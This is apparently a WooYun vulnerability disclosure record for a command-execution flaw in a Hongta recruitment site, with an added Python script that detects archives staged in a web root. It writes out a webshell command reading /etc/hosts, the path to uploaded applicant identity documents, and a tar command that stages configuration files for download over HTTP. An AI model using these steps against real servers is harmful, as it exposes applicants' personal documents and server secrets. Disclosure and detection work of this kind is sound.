WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2016-05-15: Details sent to the vendor, awaiting vendor handling
2016-05-20: Vendor has confirmed; details disclosed to the vendor only
2016-05-30: Details disclosed to core white hats and experts in the relevant field
2016-06-09: Details disclosed to regular white hats
2016-06-19: Details disclosed to intern white hats
2016-07-04: Details disclosed to the public
Command execution
Hongta Recruitment
http://zp.hongta.com/HRWEB/hr/recruitInfoParentAction/getNotices
★K8cmd-> cat /etc/hosts
The server holds a large number of applicants' identity documents.
All of the uploaded resources live in this directory:
/opt/IBM/WebSphere/Profiles/HRWebProfile/installedApps/HRWebCell/HRWEB_war.ear/HRWEB.war/upload/
Pack them into an archive and every file can be pulled down. For example, to look at the configuration:
tar -cvf /opt/IBM/WebSphere/Profiles/HRWebProfile/installedApps/HRWebCell/HRWEB_war.ear/HRWEB.war/wpp.tar.gz /opt/IBM/WebSphere/Profiles/HRWebProfile/installedApps/HRWebCell/HRWEB_war.ear/HRWEB.war/WEB-INF/
Then requesting http://zp.hongta.com/HRWEB/wpp.tar.gz downloads the configuration and everything else; the identity documents are even easier to get.
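As an added defensive check (not part of the original report), the following Python script walks a WebSphere installedApps tree and flags archive files placed in a served location of an exploded .war, which is the staging pattern described above; the directory names mirror the report's path, and the sample files it builds are constructed for the demonstration.

```python
import os
import tempfile
from pathlib import Path

# Added defensive check, not from the report. It walks a WebSphere installedApps tree and
# flags archive files that sit in a *served* location of an exploded .war, the staging
# pattern the report describes (WEB-INF packed into wpp.tar.gz inside the web root).
ARCHIVE_SUFFIXES = (".tar", ".tar.gz", ".tgz", ".zip", ".7z", ".rar")
NOT_SERVED = {"WEB-INF", "META-INF"}  # the servlet container refuses to serve these directly


def find_staged_archives(installed_apps):
    """Return sorted posix paths of archives reachable through the web root of any .war."""
    hits = []
    for root, _dirs, files in os.walk(installed_apps):
        parts = Path(root).parts
        war_idx = [i for i, p in enumerate(parts) if p.endswith(".war")]
        if not war_idx:
            continue  # not inside an exploded .war
        inside_war = parts[war_idx[-1] + 1:]
        if NOT_SERVED.intersection(inside_war):
            continue  # an archive under WEB-INF/META-INF is not downloadable as-is
        for name in files:
            if name.lower().endswith(ARCHIVE_SUFFIXES):
                hits.append((Path(root) / name).as_posix())
    return sorted(hits)


def build_sample_tree(base):
    """Constructed sample mirroring the report's layout (hypothetical file contents)."""
    war = Path(base) / "HRWebCell" / "HRWEB_war.ear" / "HRWEB.war"
    files = {
        war / "wpp.tar.gz": b"staged archive in web root",   # should be flagged
        war / "WEB-INF" / "web.xml": b"<web-app/>",          # normal, not an archive
        war / "WEB-INF" / "backup.zip": b"zip",               # archive, but not served
        war / "upload" / "applicant_001.jpg": b"jpeg bytes",  # uploaded document, not archive
    }
    for path, data in files.items():
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_bytes(data)
    return war


def demo():
    """Build the sample tree in a temp dir and return what the scan flags."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return find_staged_archives(tmp)


if __name__ == "__main__":
    for hit in demo():
        print("archive reachable from web root:", hit)
```

Point it at the real installedApps directory of a profile to find archives that someone has staged for download through the application's own URL space.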
Fix: disable debug mode.
Severity: Medium
Vulnerability Rank: 8
Confirmed: 2016-05-20 08:19
The vulnerability has been fixed.
None yet